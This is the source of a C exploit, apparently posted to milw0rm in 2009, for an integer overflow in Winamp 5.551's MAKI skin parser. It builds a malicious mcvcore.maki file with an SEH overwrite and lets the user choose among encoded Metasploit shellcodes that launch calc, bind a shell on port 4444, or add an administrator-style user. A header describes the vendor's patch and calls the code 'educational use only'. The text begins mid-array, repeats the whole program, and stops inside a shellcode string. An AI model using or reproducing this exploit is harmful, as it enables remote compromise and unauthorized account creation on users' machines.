0xC0, 0xBC, 0x3A, 0x40, 0x22, 0x6F, 0xD6, 0x4B, 0x8B, 0xA4, 0x10, 0xC8,
0x29, 0x93, 0x25, 0x47, 0x4D, 0x3E, 0xAA, 0x97, 0xD0, 0xF4, 0xA8, 0x4F,
0x81, 0x7B, 0x0D, 0x0A, 0xF2, 0x2A, 0x45, 0x49, 0x83, 0xFA, 0xBB, 0xE4,
0x64, 0xF4, 0x81, 0xD9, 0x49, 0xB0, 0xC0, 0xA8, 0x5B, 0x2E, 0xC3, 0xBC,
0xFD, 0x3F, 0x5E, 0xB6, 0x62, 0x5E, 0x37, 0x8D, 0x40, 0x8D, 0xEA, 0x76,
0x81, 0x4A, 0xB9, 0x1B, 0x77, 0xBE, 0x97, 0x4F, 0xCE, 0xB0, 0x77, 0x19,
0x4E, 0x99, 0x56, 0xD4, 0x98, 0x33, 0xC9, 0x6C, 0x27, 0x0D, 0x20, 0xC2,
0xA8, 0xEB, 0x51, 0x2A, 0x4B, 0xBA, 0x7F, 0x5D, 0x4B, 0xC6, 0x5D, 0x4C,
0x71, 0x38, 0xBA, 0x1E, 0x8D, 0x9E, 0x48, 0x3E, 0x48, 0xB9, 0x60, 0x8D,
0x1F, 0x43, 0xC5, 0xC4, 0x05, 0x40, 0xC9, 0x08, 0x0F, 0x39, 0xAF, 0x23,
0x4B, 0x80, 0xF3, 0xB8, 0xC4, 0x8F, 0x7E, 0xBB, 0x59, 0x72, 0x86, 0xAA,
0xEF, 0x0E, 0x31, 0xFA, 0x41, 0xB7, 0xDC, 0x85, 0xA9, 0x52, 0x5B, 0xCB,
0x4B, 0x44, 0x32, 0xFD, 0x7D, 0x51, 0x37, 0x7C, 0x4E, 0xBF, 0x40, 0x82,
0xAE, 0x5F, 0x3A, 0xDC, 0x33, 0x15, 0xFA, 0xB9, 0x5A, 0x7D, 0x9A, 0x57,
0x45, 0xAB, 0xC8, 0x65, 0x57, 0xA6, 0xC6, 0x7C, 0xA9, 0xCD, 0xDD, 0x8E,
0x69, 0x1E, 0x8F, 0xEC, 0x4F, 0x9B, 0x12, 0xF9, 0x44, 0xF9, 0x09, 0xFF,
0x45, 0x27, 0xCD, 0x64, 0x6B, 0x26, 0x5A, 0x4B, 0x4C, 0x8C, 0x59, 0xE6,
0xA7, 0x0C, 0xF6, 0x49, 0x3A, 0xE4, 0x05, 0xCB, 0x6D, 0xC4, 0x8A, 0xC2,
0x48, 0xB1, 0x93, 0x49, 0xF0, 0x91, 0x0E, 0xF5, 0x4A, 0xFF, 0xCF, 0xDC,
0xB4, 0xFE, 0x81, 0xCC, 0x4B, 0x96, 0x1B, 0x72, 0x0F, 0xD5, 0xBE, 0x0F,
0xFF, 0xE1, 0x8C, 0xE2, 0x01, 0x59, 0xB0, 0xD5, 0x11, 0x97, 0x9F, 0xE4,
0xDE, 0x6F, 0x51, 0x76, 0x0D, 0x0A, 0xBD, 0xF8, 0xF0, 0x80, 0xA5, 0x1B,
0xA6, 0x42, 0xA0, 0x93, 0x32, 0x36, 0xA0, 0x0C, 0x8D, 0x4A, 0x1B, 0x34,
0x2E, 0x9B, 0x98, 0x6C, 0xFA, 0x40, 0x8B, 0x85, 0x0C, 0x1B, 0x6E, 0xE8,
0x94, 0x05, 0x71, 0x9B, 0xD5, 0x36, 0xFD, 0x03, 0xF8, 0x4A, 0x97, 0x95,
0x05, 0x02, 0xB7, 0xDB, 0x26, 0x7A, 0x10, 0xF2, 0xD5, 0x7F, 0xC4, 0xAC,
0xDF, 0x48, 0xA6, 0xA0, 0x54, 0x51, 0x57, 0x6C, 0xDC, 0x76, 0x35, 0xA5,
0xBA, 0xB5, 0xB3, 0x05, 0xCB, 0x4D, 0xAD, 0xC1, 0xE6, 0x18, 0xD2, 0x8F,
0x68, 0x96, 0xC1, 0xFE, 0x29, 0x61, 0xB7, 0xDA, 0x51, 0x4D, 0x91, 0x65,
0x01, 0xCA, 0x0C, 0x1B, 0x70, 0xDB, 0xF7, 0x14, 0x95, 0xD5, 0x36, 0xED,
0xE8, 0x45, 0x98, 0x0F, 0x3F, 0x4E, 0xA0, 0x52, 0x2C, 0xD9, 0x82, 0x4B,
0x3B, 0x9B, 0x7A, 0x66, 0x0E, 0x42, 0x8F, 0xFC, 0x79, 0x41, 0x15, 0x80,
0x9C, 0x02, 0x99, 0x31, 0xED, 0xC7, 0x19, 0x53, 0x98, 0x47, 0x98, 0x63,
0x60, 0xB1, 0x5A, 0x29, 0x8C, 0xAA, 0x4D, 0xC1, 0xBB, 0xE2, 0xF6, 0x84,
0x73, 0x41, 0xBD, 0xB3, 0xB2, 0xEB, 0x2F, 0x66, 0x55, 0x50, 0x94, 0x05,
0xC0, 0x73, 0x1F, 0x96, 0x1B, 0x40, 0x9B, 0x1B, 0x67, 0x24, 0x27, 0xAC,
0x41, 0x65, 0x22, 0xBA, 0x3D, 0x59, 0x77, 0xD0, 0x76, 0x49, 0xB9, 0x52,
0xF4, 0x71, 0x36, 0x55, 0x40, 0x0B, 0x82, 0x02, 0x03, 0xD4, 0xAB, 0x3A,
0x87, 0x4D, 0x87, 0x8D, 0x12, 0x32, 0x6F, 0xAD, 0xFC, 0xD5, 0x83, 0xC2,
0xDE, 0x24, 0x6E, 0xB7, 0x36, 0x4A, 0x8C, 0xCC, 0x9E, 0x24, 0xC4, 0x6B,
0x6C, 0x73, 0x37, 0x00
};
/*Trigger the Integer overflow*/
unsigned char Exception [] =
{
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF
};
/* win32_exec - EXITFUNC=seh CMD=Calc Size=343
Encoder=PexAlphaNum http://metasploit.com */
char Calc_ShellCode [] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x50\x42\x30\x42\x50\x4b\x58\x45\x34\x4e\x43\x4b\x48\x4e\x37"
"\x45\x50\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x34\x4a\x41\x4b\x58"
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x43\x4b\x38"
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c"
"\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x55\x46\x42\x46\x50\x45\x37\x45\x4e\x4b\x48"
"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x30\x4b\x54"
"\x4b\x58\x4f\x35\x4e\x51\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x58"
"\x41\x30\x4b\x4e\x49\x58\x4e\x55\x46\x52\x46\x50\x43\x4c\x41\x43"
"\x42\x4c\x46\x46\x4b\x38\x42\x54\x42\x33\x45\x38\x42\x4c\x4a\x57"
"\x4e\x50\x4b\x58\x42\x54\x4e\x50\x4b\x48\x42\x37\x4e\x31\x4d\x4a"
"\x4b\x48\x4a\x56\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b"
"\x42\x30\x42\x50\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x45\x41\x33"
"\x48\x4f\x42\x46\x48\x35\x49\x48\x4a\x4f\x43\x38\x42\x4c\x4b\x57"
"\x42\x35\x4a\x56\x42\x4f\x4c\x38\x46\x50\x4f\x55\x4a\x46\x4a\x49"
"\x50\x4f\x4c\x48\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x34\x41\x36"
"\x4e\x46\x43\x36\x42\x50\x5a";
/* win32_bind - EXITFUNC=seh LPORT=4444 Size=709
Encoder=PexAlphaNum http://metasploit.com */
char Bind_Shellcode [] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x46\x4b\x4e"
"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48"
"\x4e\x36\x46\x52\x46\x42\x4b\x58\x45\x54\x4e\x43\x4b\x38\x4e\x47"
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x48"
"\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x34\x4b\x48\x46\x33\x4b\x58"
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x49\x4e\x4a\x46\x38\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x42\x4a\x42\x45\x47\x45\x4e\x4b\x48"
"\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x56\x4b\x38\x4e\x30\x4b\x54"
"\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x43\x50\x4e\x42\x4b\x38"
"\x49\x48\x4e\x56\x46\x42\x4e\x31\x41\x56\x43\x4c\x41\x33\x4b\x4d"
"\x46\x56\x4b\x48\x43\x34\x42\x33\x4b\x48\x42\x44\x4e\x30\x4b\x48"
"\x42\x57\x4e\x31\x4d\x4a\x4b\x38\x42\x34\x4a\x30\x50\x45\x4a\x46"
"\x50\x38\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56"
"\x43\x45\x48\x36\x4a\x36\x43\x53\x44\x53\x4a\x56\x47\x57\x43\x37"
"\x44\x53\x4f\x45\x46\x55\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x33\x42\x55\x4f\x4f\x48\x4d\x4f\x35\x49\x58\x45\x4e"
"\x48\x56\x41\x48\x4d\x4e\x4a\x50\x44\x30\x45\x55\x4c\x56\x44\x30"
"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45"
"\x4f\x4f\x48\x4d\x43\x55\x43\x55\x43\x35\x43\x55\x43\x55\x43\x54"
"\x43\x55\x43\x34\x43\x55\x4f\x4f\x42\x4d\x48\x56\x4a\x46\x41\x51"
"\x4e\x55\x48\x46\x43\x45\x49\x48\x41\x4e\x45\x49\x4a\x36\x46\x4a"
"\x4c\x31\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x56\x42\x41"
"\x41\x55\x45\x45\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d"
"\x4a\x36\x45\x4e\x49\x34\x48\x58\x49\x54\x47\x45\x4f\x4f\x48\x4d"
"\x42\x55\x46\x45\x46\x55\x45\x35\x4f\x4f\x42\x4d\x43\x49\x4a\x36"
"\x47\x4e\x49\x47\x48\x4c\x49\x47\x47\x55\x4f\x4f\x48\x4d\x45\x55"
"\x4f\x4f\x42\x4d\x48\x46\x4c\x56\x46\x46\x48\x36\x4a\x56\x43\x46"
"\x4d\x36\x49\x38\x45\x4e\x4c\x56\x42\x35\x49\x55\x49\x32\x4e\x4c"
"\x49\x38\x47\x4e\x4c\x46\x46\x44\x49\x58\x44\x4e\x41\x43\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x54\x4e\x42"
"\x43\x39\x4d\x48\x4c\x57\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
"\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x47\x46\x44\x4f\x4f"
"\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x45\x41\x45\x41\x55\x4c\x36"
"\x41\x30\x41\x35\x41\x45\x45\x35\x41\x55\x4f\x4f\x42\x4d\x4a\x46"
"\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x55\x4f\x4f\x48\x4d\x4c\x36"
"\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x48\x47\x45\x4e\x4f"
"\x43\x58\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x35\x4f\x4f\x42\x4d"
"\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x45\x43\x35\x4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a";
/* win32_adduser - PASS=n00b EXITFUNC=seh USER=n00b Size=489
Encoder=PexAlphaNum http://metasploit.com */
char Add_User_Shellcode [] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
"\x42\x50\x42\x30\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x48\x4e\x57"
"\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x51\x4b\x38"
"\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x43\x4b\x48"
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x38\x42\x4c"
"\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"
"\x4f\x45\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x48\x4e\x30\x4b\x44"
"\x4b\x48\x4f\x45\x4e\x51\x41\x30\x4b\x4e\x4b\x58\x4e\x51\x4b\x58"
"\x41\x30\x4b\x4e\x49\x48\x4e\x45\x46\x42\x46\x30\x43\x4c\x41\x43"
"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x47"
"\x4e\x50\x4b\x48\x42\x34\x4e\x50\x4b\x58\x42\x37\x4e\x41\x4d\x4a"
"\x4b\x58\x4a\x36\x4a\x50\x4b\x4e\x49\x50\x4b\x58\x42\x38\x42\x4b"
"\x42\x30\x42\x30\x42\x50\x4b\x38\x4a\x46\x4e\x33\x4f\x35\x41\x43"
"\x48\x4f\x42\x56\x48\x35\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x37"
"\x42\x45\x4a\x46\x42\x4f\x4c\x38\x46\x50\x4f\x35\x4a\x46\x4a\x49"
"\x50\x4f\x4c\x58\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x4d\x56"
"\x46\x56\x50\x52\x45\x36\x4a\x57\x45\x56\x42\x42\x4f\x32\x43\x46"
"\x42\x52\x50\x56\x45\x46\x46\x57\x42\x42\x45\x57\x43\x37\x45\x36"
"\x44\x57\x42\x32\x50\x46\x42\x43\x42\x53\x44\x56\x42\x42\x50\x36"
"\x42\x53\x42\x43\x44\x36\x42\x42\x4f\x32\x41\x54\x46\x44\x46\x44"
"\x42\x42\x48\x32\x48\x52\x42\x52\x50\x36\x45\x56\x46\x47\x42\x52"
"\x4e\x56\x4f\x36\x43\x36\x41\x56\x4e\x56\x47\x56\x44\x57\x4f\x56"
"\x45\x47\x42\x37\x42\x42\x41\x54\x46\x46\x4d\x56\x49\x46\x50\x56"
"\x49\x46\x43\x57\x46\x57\x44\x37\x41\x56\x46\x37\x4f\x36\x44\x57"
"\x43\x47\x42\x42\x50\x46\x42\x43\x42\x33\x44\x46\x42\x42\x4f\x52"
"\x41\x44\x46\x44\x46\x44\x42\x30\x5a";
unsigned char Junk1 ='A';
int main()
{
FILE *fp;
int i;
if ((fp = fopen(MAKI, "wb")) == NULL)
{
printf("File %s write error\n", MAKI);
return(0);
}
for (i=0; i<sizeof(First_Header); i++)
fputc(First_Header[i], fp);
for (i=0; i<sizeof(Exception); i++)
fputc(Exception[i], fp);
for (i=0;i<16751;i++)
{
fwrite(&Junk1,1,1,fp);
}
fputs("\xeb\x06\x90\x90",fp);/*Pointer to next seh record */
fputs("\x7C\x14\xF0\x12",fp);/*SE handler Universal adress 12F0147C */
int input;
printf("\n------------------------------------------------------");
printf("\nWinamp 5.551 MAKI Parsing Integer Overflow Exploit !!!");
printf("\n\nExploit created by n00b");
printf( "\n[1]. Calc Shell_Code" );
printf( "\n[2]. Bind Shell_Code on port 4444" );
printf( "\n[3]. Add user Shell_Code" );
printf( "\n[4]. To exit and cancel" );
printf( "\nPlease chose your Shell_Code:" );
scanf( "%d", &input );
switch ( input )
{
case 1:
for (i=0; i<sizeof(Calc_ShellCode); i++)
fputc(Calc_ShellCode[i], fp);
break;
case 2:
for (i=0; i<sizeof(Bind_Shellcode); i++)
fputc(Bind_Shellcode[i], fp);
break;
case 3:
for (i=0; i<sizeof(Add_User_Shellcode); i++)
fputc(Add_User_Shellcode[i], fp);
break;
case 4:
return 0;
break;
}
fclose(fp);
return 0;
}
// milw0rm.com [2009-05-26]
/**************************************************************
Winamp 5.551 MAKI Parsing Integer Overflow Exploit !!!
Tested on :Vista sp1 and Xpsp3
Release Date :May 22 2009
Venders web site :http://www.winamp.com/
Version Tested:Winamp 5.551
Not vulnerable :Winamp 5.552
Credits to Monica Sojeong Hong down at vrt-sourcefire for the overflow.
http://vrt-sourcefire.blogspot.com
As we know we are able to overwrite the exception handlers so
we can exploit this on multiple OS i tested these on xpsp3 <eng>
<Vista sp1> And all worked fine.
I wrote the exploits because i had tried the 2 exploits posted
on milw0rm they were tested on winxp sp3 and vista sp1 and i couldn't
get them to execute shell code which prompted me into writing my
own version!!
Below i have provided a look into the disassembly of the new
changes in the 555.2 version of winamp the main change was in
gen_ff.dll.
---snip--
A quick look at the new gen_ff.dll.
----------------------------------
loc_12094F62:
mov ax, [ebx]
movzx edi, ax -Extends ax into edi register.-
inc ebx
push edi ; Size
inc ebx
lea eax, [ebp+MultiByteStr]
push ebx ; Src
push eax ; Dst
call memmove
------------------------
loc_120951E9:
mov edi, [ebx]
add ebx, 4
mov ax, [ebx]
movzx esi, ax -Extends ax into esi register.-
inc ebx
push esi ; Size
inc ebx
lea eax, [ebp+var_2014C] <-- This was also changed.
push ebx ; Src
push eax ; Dst
call memmove
This is a simple run down of the new patch
that was applied to winamp winamp 5.552 If we look closely we can see they
changed the sign extension.
=555.1 .dll=
----------
movsx esi, ax = movsx(dest , source );
Copies source operand dest and extends the value.
Changed in the new gen_ff.dll.
=555.2 .dll=
----------
movzx esi, ax
Zero extend the 8 bit registers.
Copies data and sign extends the data while copying it.
Destination= 16 - 32 bit.
Source = 8 or a 16byte or maybe even 1 byte of memory
Source = the destination must be of greater value than the source.
This was a few of the changes within the new dll from winamp.Im
sure if you want to dig deeper you can get both dll and compare them
to see the changes that are made.So basically they have changed the
instruction from Copy with sign extension to copy with zero extension.
This can also be displayed when looking at the stack at the time of the
exception in the new version of winamp after steeping through the exception
although we can cause and exception we cant overwrite the 4 bytes on the
stack we can only overwrite 2 and it is always capped with 00FF.
---snip--
Special thanks to str0ke :)
Credits to n00b for writing exploit code !!
Progression is always a good thing.
----------
Disclaimer
----------
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!
***************************************************************/
#include <stdio.h>
#define MAKI "mcvcore.maki"
unsigned char First_Header[] =
{
0x46, 0x47, 0x03, 0x04, 0x17, 0x00, 0x00, 0x00, 0x2A, 0x00, 0x00, 0x00,
0x71, 0x49, 0x65, 0x51, 0x87, 0x0D, 0x51, 0x4A, 0x91, 0xE3, 0xA6, 0xB5,
0x32, 0x35, 0xF3, 0xE7, 0x64, 0x0F, 0xF5, 0xD6, 0xFA, 0x93, 0xB7, 0x49,
0x93, 0xF1, 0xBA, 0x66, 0xEF, 0xAE, 0x3E, 0x98, 0x7B, 0xC4, 0x0D, 0xE9,
0x0D, 0x84, 0xE7, 0x4A, 0xB0, 0x2C, 0x04, 0x0B, 0xD2, 0x75, 0xF7, 0xFC,
0xB5, 0x3A, 0x02, 0xB2, 0x4D, 0x43, 0xA1, 0x4B, 0xBE, 0xAE, 0x59, 0x63,
0x75, 0x03, 0xF3, 0xC6, 0x78, 0x57, 0xC6, 0x87, 0x43, 0xE7, 0xFE, 0x49,
0x85, 0xF9, 0x09, 0xCC, 0x53, 0x2A, 0xFD, 0x56, 0x65, 0x36, 0x60, 0x38,
0x1B, 0x46, 0xA7, 0x42, 0xAA, 0x75, 0xD8, 0x3F, 0x66, 0x67, 0xBF, 0x73,
0xF4, 0x7A, 0x78, 0xF4, 0xBB, 0xB2, 0xF7, 0x4E, 0x9C, 0xFB, 0xE7, 0x4B,
0xA9, 0xBE, 0xA8, 0x8D, 0x02, 0x0C, 0x37, 0x3A, 0xBF, 0x3C, 0x9F, 0x43,
0x84, 0xF1, 0x86, 0x88, 0x5B, 0xCF, 0x1E, 0x36, 0xB6, 0x5B, 0x0C, 0x5D,
0xE1, 0x7D, 0x1F, 0x4B, 0xA7, 0x0F, 0x8D, 0x16, 0x59, 0x94, 0x19, 0x41,
0x99, 0xE1, 0xE3, 0x4E, 0x36, 0xC6, 0xEC, 0x4B, 0x97, 0xCD, 0x78, 0xBC,
0x9C, 0x86, 0x28, 0xB0, 0xE5, 0x95, 0xBE, 0x45, 0x72, 0x20, 0x91, 0x41,
0x93, 0x5C, 0xBB, 0x5F, 0xF9, 0xF1, 0x17, 0xFD, 0x4E, 0x6D, 0x90, 0x60,
0x7E, 0x53, 0x2E, 0x48, 0xB0, 0x04, 0xCC, 0x94, 0x61, 0x88, 0x56, 0x72,
0xC0, 0xBC, 0x3A, 0x40, 0x22, 0x6F, 0xD6, 0x4B, 0x8B, 0xA4, 0x10, 0xC8,
0x29, 0x93, 0x25, 0x47, 0x4D, 0x3E, 0xAA, 0x97, 0xD0, 0xF4, 0xA8, 0x4F,
0x81, 0x7B, 0x0D, 0x0A, 0xF2, 0x2A, 0x45, 0x49, 0x83, 0xFA, 0xBB, 0xE4,
0x64, 0xF4, 0x81, 0xD9, 0x49, 0xB0, 0xC0, 0xA8, 0x5B, 0x2E, 0xC3, 0xBC,
0xFD, 0x3F, 0x5E, 0xB6, 0x62, 0x5E, 0x37, 0x8D, 0x40, 0x8D, 0xEA, 0x76,
0x81, 0x4A, 0xB9, 0x1B, 0x77, 0xBE, 0x97, 0x4F, 0xCE, 0xB0, 0x77, 0x19,
0x4E, 0x99, 0x56, 0xD4, 0x98, 0x33, 0xC9, 0x6C, 0x27, 0x0D, 0x20, 0xC2,
0xA8, 0xEB, 0x51, 0x2A, 0x4B, 0xBA, 0x7F, 0x5D, 0x4B, 0xC6, 0x5D, 0x4C,
0x71, 0x38, 0xBA, 0x1E, 0x8D, 0x9E, 0x48, 0x3E, 0x48, 0xB9, 0x60, 0x8D,
0x1F, 0x43, 0xC5, 0xC4, 0x05, 0x40, 0xC9, 0x08, 0x0F, 0x39, 0xAF, 0x23,
0x4B, 0x80, 0xF3, 0xB8, 0xC4, 0x8F, 0x7E, 0xBB, 0x59, 0x72, 0x86, 0xAA,
0xEF, 0x0E, 0x31, 0xFA, 0x41, 0xB7, 0xDC, 0x85, 0xA9, 0x52, 0x5B, 0xCB,
0x4B, 0x44, 0x32, 0xFD, 0x7D, 0x51, 0x37, 0x7C, 0x4E, 0xBF, 0x40, 0x82,
0xAE, 0x5F, 0x3A, 0xDC, 0x33, 0x15, 0xFA, 0xB9, 0x5A, 0x7D, 0x9A, 0x57,
0x45, 0xAB, 0xC8, 0x65, 0x57, 0xA6, 0xC6, 0x7C, 0xA9, 0xCD, 0xDD, 0x8E,
0x69, 0x1E, 0x8F, 0xEC, 0x4F, 0x9B, 0x12, 0xF9, 0x44, 0xF9, 0x09, 0xFF,
0x45, 0x27, 0xCD, 0x64, 0x6B, 0x26, 0x5A, 0x4B, 0x4C, 0x8C, 0x59, 0xE6,
0xA7, 0x0C, 0xF6, 0x49, 0x3A, 0xE4, 0x05, 0xCB, 0x6D, 0xC4, 0x8A, 0xC2,
0x48, 0xB1, 0x93, 0x49, 0xF0, 0x91, 0x0E, 0xF5, 0x4A, 0xFF, 0xCF, 0xDC,
0xB4, 0xFE, 0x81, 0xCC, 0x4B, 0x96, 0x1B, 0x72, 0x0F, 0xD5, 0xBE, 0x0F,
0xFF, 0xE1, 0x8C, 0xE2, 0x01, 0x59, 0xB0, 0xD5, 0x11, 0x97, 0x9F, 0xE4,
0xDE, 0x6F, 0x51, 0x76, 0x0D, 0x0A, 0xBD, 0xF8, 0xF0, 0x80, 0xA5, 0x1B,
0xA6, 0x42, 0xA0, 0x93, 0x32, 0x36, 0xA0, 0x0C, 0x8D, 0x4A, 0x1B, 0x34,
0x2E, 0x9B, 0x98, 0x6C, 0xFA, 0x40, 0x8B, 0x85, 0x0C, 0x1B, 0x6E, 0xE8,
0x94, 0x05, 0x71, 0x9B, 0xD5, 0x36, 0xFD, 0x03, 0xF8, 0x4A, 0x97, 0x95,
0x05, 0x02, 0xB7, 0xDB, 0x26, 0x7A, 0x10, 0xF2, 0xD5, 0x7F, 0xC4, 0xAC,
0xDF, 0x48, 0xA6, 0xA0, 0x54, 0x51, 0x57, 0x6C, 0xDC, 0x76, 0x35, 0xA5,
0xBA, 0xB5, 0xB3, 0x05, 0xCB, 0x4D, 0xAD, 0xC1, 0xE6, 0x18, 0xD2, 0x8F,
0x68, 0x96, 0xC1, 0xFE, 0x29, 0x61, 0xB7, 0xDA, 0x51, 0x4D, 0x91, 0x65,
0x01, 0xCA, 0x0C, 0x1B, 0x70, 0xDB, 0xF7, 0x14, 0x95, 0xD5, 0x36, 0xED,
0xE8, 0x45, 0x98, 0x0F, 0x3F, 0x4E, 0xA0, 0x52, 0x2C, 0xD9, 0x82, 0x4B,
0x3B, 0x9B, 0x7A, 0x66, 0x0E, 0x42, 0x8F, 0xFC, 0x79, 0x41, 0x15, 0x80,
0x9C, 0x02, 0x99, 0x31, 0xED, 0xC7, 0x19, 0x53, 0x98, 0x47, 0x98, 0x63,
0x60, 0xB1, 0x5A, 0x29, 0x8C, 0xAA, 0x4D, 0xC1, 0xBB, 0xE2, 0xF6, 0x84,
0x73, 0x41, 0xBD, 0xB3, 0xB2, 0xEB, 0x2F, 0x66, 0x55, 0x50, 0x94, 0x05,
0xC0, 0x73, 0x1F, 0x96, 0x1B, 0x40, 0x9B, 0x1B, 0x67, 0x24, 0x27, 0xAC,
0x41, 0x65, 0x22, 0xBA, 0x3D, 0x59, 0x77, 0xD0, 0x76, 0x49, 0xB9, 0x52,
0xF4, 0x71, 0x36, 0x55, 0x40, 0x0B, 0x82, 0x02, 0x03, 0xD4, 0xAB, 0x3A,
0x87, 0x4D, 0x87, 0x8D, 0x12, 0x32, 0x6F, 0xAD, 0xFC, 0xD5, 0x83, 0xC2,
0xDE, 0x24, 0x6E, 0xB7, 0x36, 0x4A, 0x8C, 0xCC, 0x9E, 0x24, 0xC4, 0x6B,
0x6C, 0x73, 0x37, 0x00
};
/*Trigger the Integer overflow*/
unsigned char Exception [] =
{
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xFF, 0xFF
};
/* win32_exec - EXITFUNC=seh CMD=Calc Size=343
Encoder=PexAlphaNum http://metasploit.com */
char Calc_ShellCode [] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
"\x42\x50\x42\x30\x42\x50\x4b\x58\x45\x34\x4e\x43\x4b\x48\x4e\x37"
"\x45\x50\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x34\x4a\x41\x4b\x58"
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x44\x4b\x48\x46\x43\x4b\x38"
"\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c"
"\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x55\x46\x42\x46\x50\x45\x37\x45\x4e\x4b\x48"
"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x4e\x30\x4b\x54"
